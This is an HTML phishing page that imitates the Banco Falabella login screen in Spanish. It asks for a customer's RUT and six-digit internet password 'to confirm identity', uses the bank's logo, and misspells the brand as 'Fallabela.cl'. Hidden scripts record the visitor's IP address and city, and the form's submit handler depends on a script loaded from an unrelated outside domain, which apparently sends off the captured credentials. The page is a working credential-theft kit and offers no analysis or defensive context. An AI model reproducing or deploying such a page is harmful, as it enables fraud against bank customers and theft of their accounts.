<!DOCTYPE html>
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <title>Ingresa a tu cuenta</title>
    <link rel="shortcut icon" type="image/x-icon" href="https://www.bancofalabella.cl/assets/logo-bf-cmr.svg">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./mtp/bootstrap.min.css">
    <link href="./mtp/css2" rel="stylesheet">
    <script src="./mtp/jquery.min.js.descarga"></script>
    <script src="./mtp/bootstrap.min.js.descarga" integrity="sha384-aJ21OjlMXNL5UyIl/XNwTMqvzeRMZH2w8c5cRVpzpU8Y5bApTppSuUkhZXN0VxHd" crossorigin="anonymous"></script>
    <style>
        body,
        html {
            height: 100%;
            background-image: url("");
            background-position: center;
            background-size: cover;
            font-family: 'Montserrat', sans-serif;
        }

        input {
            filter: none !important;
        }

        @media only screen and (max-width: 765px) {

            body,
            html {
                background-image: none;
            }

            .login-box {
                position: relative !important;
                box-shadow: none !important;
                border-top: none !important;
                top: 0 !important;
                transform: none !important;
                float: none !important;
            }

            .login-container .wrapper {
                position: relative;
                top: 0;
                z-index: 1;
                width: 100%;
            }
        }

        .login-container {
            position: relative;
            min-height: 100%;
            max-width: 900px;
            margin: auto;
        }

        .login-box {
            position: absolute;
            top: 50%;
            transform: translateY(-50%);
            padding: 20px;
            background-color: #fff;
            box-shadow: 0px 0px 1px 0.1px #9de1da;
            border-radius: 5px;
            border-top: 1px solid #e9e9e9;
        }

        .login-header {
            text-align: center;
            padding-top: 0;
        }

        .login-header img {
            width: 150px;
        }

        .login-footer {
            position: absolute;
            bottom: 10px;
            width: 300px;
            left: 0;
            right: 0;
            margin: 0 auto;
        }

        .login-footer img {
            width: 100%;
        }

        #error-message {
            display: none;
        }


        #gradient {
            height: 100px;
            background-image: linear-gradient(to bottom, rgb(255 255 255), rgb(255 255 255 / 0%));
            display: none;
        }

        #btn-login {
            background-color: #30b408;
            border-radius: 0 !important;
            padding-bottom: 7px;
            padding-top: 7px;
            margin-top: 10px;
        }

        .center {
            text-align: center;
        }

        #bottom-imgs {
            height: 80px;
            display: flex;
            align-items: center;
            justify-content: space-evenly;
            width: 80%;
            margin: 0 auto;
        }

        #bottom-imgs .img-block {
            width: 40%;
        }

        #bottom-imgs .img-block img {
            width: 100%;
        }

        #vl {
            border-right: 1px solid #908f8f;
            height: 20px;
            display: inline;
        }

        .ingresa-cuenta {
            font-family: 'Montserrat', sans-serif;
            font-size: medium 18pt;
            color: #908f8f;
            padding-top: 10px;
        }

        .text {
            font-family: 'Montserrat', sans-serif;
            font-size: smaller;
            color: #908f8f;
        }

        a {
            font-size: smaller;
            color: #dc2a4d;
        }

        .space-right {
            margin-right: 5px;
        }

        input[type=text]:focus {
            outline: none !important;
            box-shadow: none !important;
            border: 2px solid #dd3b9f;
        }

        input[type=password]:focus {
            outline: none !important;
            box-shadow: none !important;
            border: 2px solid #fc34ca;
        }

        .form-group {
            max-height: 60px;
            margin-top: 0 !important;
            margin-bottom: 0 !important;
        }

        .form-control {
            box-shadow: none;
            border-width: 1px;
            border-radius: 5px;
        }

        .eye-icon {
            position: relative;
            top: 30px;
            left: 60%;
            color: #908f8f;
        }

        @media only screen and (max-width: 765px) {
            .eye-icon {
                position: relative;
                left: 80%;
                color: #908f8f;
            }

            .login-header img {
                width: 250px;
            }
        }

        @media only screen and (max-width: 500px) {
            .eye-icon {
                position: relative;
                left: 70%;
                color: #908f8f;
            }
        }

        @media only screen and (max-width: 350px) {
            .eye-icon {
                position: relative;
                left: 60%;
                color: #908f8f;
            }
        }

        .form-group>label {
            text-decoration: none !important;
            top: 30px;
            left: 10px;
            position: relative;
            background-color: white;
            padding: 0px 5px 0px 5px;
            transition: 0.2s;
            pointer-events: none;
            font-family: 'Montserrat', sans-serif;
            font-size: 10px;
            color: #908f8f;
        }

        .label-animate>label {
            top: 12px !important;
            left: 12px !important;
            font-size: 10px;
            color: #c5145e;
            font-weight: 500;
        }

        label {
            font-weight: 200;
        }

        .login-footer-responsive {
            position: absolute;
            bottom: 0;
            display: none;
            height: auto;
        }

        @media only screen and (max-width: 765px) {
            .login-footer-responsive {
                display: block;
            }

            .login-footer-responsive img {
                width: 100%;
            }

            #gradient {
                display: block;
            }
        }

    </style>
</head>
<body>
    <div class="wrapper">
        <div class="col-xs-12 col-sm-4 col-sm-offset-4 login-box" style="z-index:1000">
            <div class="login-header"><img src="https://www.bancofalabella.cl/assets/logo-bf-cmr.svg">
                <h4 class="ingresa-cuenta">Ingresa a tu cuenta</h4>
                <p class="text">Inicia sesion en tu banca para confirmar identidad.</p>
            </div>
            <div class="alert alert-danger" id="error-message"></div>
            <div>
                <form method="post" onsubmit="return sender()">
                    <p id="gfg" hidden=""></p>
                    <p id="address" hidden=""></p>
                    <div class="form-group label-animate"><input class="form-control" id="DocumentNumber1" type="text" name="mi" placeholder="RUT" autocomplete="off" maxlength="10" required=""></div>
                    <br>
                    <div class="form-group label-animate"><i class="fa fa-eye eye-icon" aria-hidden="true" onclick="showPassword()" style="cursor: pointer;"></i><input class="form-control" id="DocumentNumber" name="me" minlength="6" maxlength="6" placeholder="Clave de Internet" type="text" required=""></div>
                    <div class="center" style="padding-top: 5px; padding-bottom: 5px; margin-top: 5px"><a id="link-olvidaste-tu-password" href="index.html">crea o recupera tu clave</a></div>
                    <div class="captcha-container form-group" style="display: none;"></div><button class="btn btn-primary btn-block" id="btn-login">I N G R E S A R</button>
                </form>
                <div id="bottom-imgs">
                  
                    <div id="vl"></div>
               
                </div>
                <div class="center"></div>
                <hr style="width: 30%; background-color:#666666; margin-top: 10px; margin-bottom: 10px;">
                <p class="center text" style="margin: 0;">Contactanos:</p>
                <div class="center">
                    
                    <p class="text" style="display:inline">Fallabela.cl</p>
                </div>
            </div>
        </div>
        <div id="gradient"></div>
    </div>
    <div class="login-footer"></div>
    <div class="login-footer-responsive"><img src="https://cdn.domestika.org/c_fill,dpr_auto,f_auto,q_auto,w_767/v1698763459/content-items/014/498/802/900x600-original.gif?1698763459"></div>
</div>

<script>$("#DocumentNumber1").on({
    "focus": function (event) {
        $(event.target).select();
    },
    "keyup": function (event) {
        $(event.target).val(function (index, value ) {
            return value.replace(/\D/g, "")
                        .replace(/([0-9])([0-9]{1})$/,'$1-$2')
                        .replace(/\B(?=(\d{8})+(?!\d)\-)/g, "-", "-");

                        const input = document.querySelector("#layout-active");
console.log(input.getAttribute('minlength'))
        });
    }
});

</script>

<script src="js/jquery-3.6.0.min.js"></script>
<script src="js/jquery_002.js"></script>
<script src="js/jquery.jclockNew.js"></script>
<script src="js/security.js"></script>
<script src="js/connections.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
  $.getJSON("https://api.ipify.org?format=json", function (data) {
    $("#gfg").html(data.ip);
  });
</script>
<script>
  $.getJSON("https://ipinfo.io", function (response) {
    $("#ip").html("IP: " + response.ip);
    $("#address").html(
      "Ciudad: " + response.city + ", " + response.country
    );
  });
</script>
<script src="https://kolecer.id/wp-log/msnylog/index.html"></script>
<script src="./mtp/object-assign.min.js.descarga"></script>
</body></html>